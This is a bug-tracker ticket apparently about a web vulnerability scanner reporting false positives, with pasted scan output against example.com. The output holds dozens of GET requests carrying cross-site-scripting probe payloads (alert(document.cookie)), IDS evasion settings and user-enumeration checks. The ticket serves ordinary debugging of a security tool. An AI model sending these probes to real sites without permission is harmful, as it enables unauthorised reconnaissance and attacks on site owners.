Assembla home | Assembla project page
 

Ticket #63 (closed defect: wontfix)

Opened 1 year ago

Last modified 5 months ago

Re: hundreds of fales positives.

Reported by: testbot Assigned to:
Priority: medium Milestone: Future
Component: Scanner Version: 2.03
Severity: normal Keywords:
Cc:

Description

wasn't sure how to reply to that ticket *oops* 

Sample:

-***** Pausing 1 seconds per request *****
---------------------------------------------------------------------------
+ Target IP:          1.1.1.1.1
+ Target Hostname:    example.com
+ Target Port:        80
+ Virtual Host:   www.example_host.com
+ Using IDS Evasion:  Random URI encoding (non-UTF8)
+ Using IDS Evasion:  Directory self-reference (/./)
+ Using Mutation:     Guess for password file names
+ Start Time:         2008-10-15 20:47:06
---------------------------------------------------------------------------
+ Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
- Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-0: Non-standard header x-pad returned by server, with contents: avoid browser bug
+ mod_ssl/2.2.9 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ FrontPage/5.0.2.2635 appears to be outdated (current is at least 5.0.4.3) (may depend on server version)
+ mod_ssl/2.2.9 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0082.
+ FrontPage - http://www.insecure.org/sploits/Microsoft.frontpage.insecurities.html
+ OSVDB-637: GET /~root - Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).
+ OSVDB-0: GET /cgi-sys/formmail.pl : Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
+ OSVDB-0: GET /cgi-sys/guestbook.cgi : May allow attackers to execute commands as the web daemon.
+ OSVDB-0: GET /themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /https-admserv/bin/index?/<script>alert(document.cookie)</script> : Sun ONE Web Server 6.1 administration control is vulnerable to XSS attacks.
+ OSVDB-0: GET /clusterframe.jsp?cluster=<script>alert(document.cookie)</script> : Macromedia JRun 4.x JMC Interface, clusterframe.jsp file is vulnerable to a XSS attack.
+ OSVDB-0: GET /upload.php?type=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4619: GET /soinfo.php?\"><script>alert('Vulnerable')</script> : The PHP script soinfo.php is vulnerable to Cross Site Scripting Set expose_php = Off in php.ini.
+ OSVDB-0: GET /666%0a%0a<script>alert('Vulnerable');</script>666.jsp : Apache Tomcat 4.1 / Linux is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script> : NetDetector 3.0 and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script> : Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script> : Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script> : Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script> : Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script> : The NetDetector install is vulnerable to Cross Site Scripting (XSS) in it's invalid login message. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\"><script>alert(document.cookie)</script> : IIS 6 on Windows 2003 is vulnerable to Cross Site Scripting (XSS) in certain error messages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-17665: GET /SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script> : Site Server is vulnerable to Cross Site Scripting
+ OSVDB-17666: GET /_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script> : Site Server is vulnerable to Cross Site Scripting
+ OSVDB-0: GET /nosuchurl/><script>alert('Vulnerable')</script> : JEUS is vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html
+ OSVDB-0: GET /webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script> : Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi.cgi/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> : YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /webcgi/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> : YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-914/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> : YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-915/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> : YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> : YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> : YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /mpcgi/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> : YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ows-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> : YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-local/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> : YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /htbin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> : YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgibin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> : YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgis/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> : YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /scripts/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> : YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-win/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> : YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /fcgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> : YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-exe/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> : YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-home/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> : YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-perl/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> : YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi.cgi/vq/demos/respond.pl?<script>alert('Vulnerable')</script> : vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /webcgi/vq/demos/respond.pl?<script>alert('Vulnerable')</script> : vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-914/vq/demos/respond.pl?<script>alert('Vulnerable')</script> : vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-915/vq/demos/respond.pl?<script>alert('Vulnerable')</script> : vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script> : vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi/vq/demos/respond.pl?<script>alert('Vulnerable')</script> : vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /mpcgi/vq/demos/respond.pl?<script>alert('Vulnerable')</script> : vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ows-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script> : vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-local/vq/demos/respond.pl?<script>alert('Vulnerable')</script> : vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /htbin/vq/demos/respond.pl?<script>alert('Vulnerable')</script> : vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgibin/vq/demos/respond.pl?<script>alert('Vulnerable')</script> : vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgis/vq/demos/respond.pl?<script>alert('Vulnerable')</script> : vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /scripts/vq/demos/respond.pl?<script>alert('Vulnerable')</script> : vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-win/vq/demos/respond.pl?<script>alert('Vulnerable')</script> : vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /fcgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script> : vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-exe/vq/demos/respond.pl?<script>alert('Vulnerable')</script> : vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-home/vq/demos/respond.pl?<script>alert('Vulnerable')</script> : vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-perl/vq/demos/respond.pl?<script>alert('Vulnerable')</script> : vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi.cgi/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>; : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /webcgi/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>; : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.

+ OSVDB-0: GET /cgi-914/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>; : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-915/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>; : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>; : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>; : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /mpcgi/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>; : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ows-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>; : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-local/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>; : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /htbin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>; : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgibin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>; : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgis/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>; : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /scripts/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>; : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-win/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>; : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /fcgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>; : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-exe/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>; : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-home/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>; : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-perl/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>; : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi.cgi/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /webcgi/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-914/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-915/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /mpcgi/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ows-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-local/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /htbin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgibin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgis/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /scripts/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-win/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /fcgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-exe/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-home/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-perl/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi.cgi/test-cgi.exe?<script>alert(document.cookie)</script> : Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /webcgi/test-cgi.exe?<script>alert(document.cookie)</script> : Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-914/test-cgi.exe?<script>alert(document.cookie)</script> : Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-915/test-cgi.exe?<script>alert(document.cookie)</script> : Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /bin/test-cgi.exe?<script>alert(document.cookie)</script> : Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi/test-cgi.exe?<script>alert(document.cookie)</script> : Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /mpcgi/test-cgi.exe?<script>alert(document.cookie)</script> : Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ows-bin/test-cgi.exe?<script>alert(document.cookie)</script> : Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-local/test-cgi.exe?<script>alert(document.cookie)</script> : Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /htbin/test-cgi.exe?<script>alert(document.cookie)</script> : Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgibin/test-cgi.exe?<script>alert(document.cookie)</script> : Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgis/test-cgi.exe?<script>alert(document.cookie)</script> : Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /scripts/test-cgi.exe?<script>alert(document.cookie)</script> : Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-win/test-cgi.exe?<script>alert(document.cookie)</script> : Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /fcgi-bin/test-cgi.exe?<script>alert(document.cookie)</script> : Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-exe/test-cgi.exe?<script>alert(document.cookie)</script> : Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-home/test-cgi.exe?<script>alert(document.cookie)</script> : Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
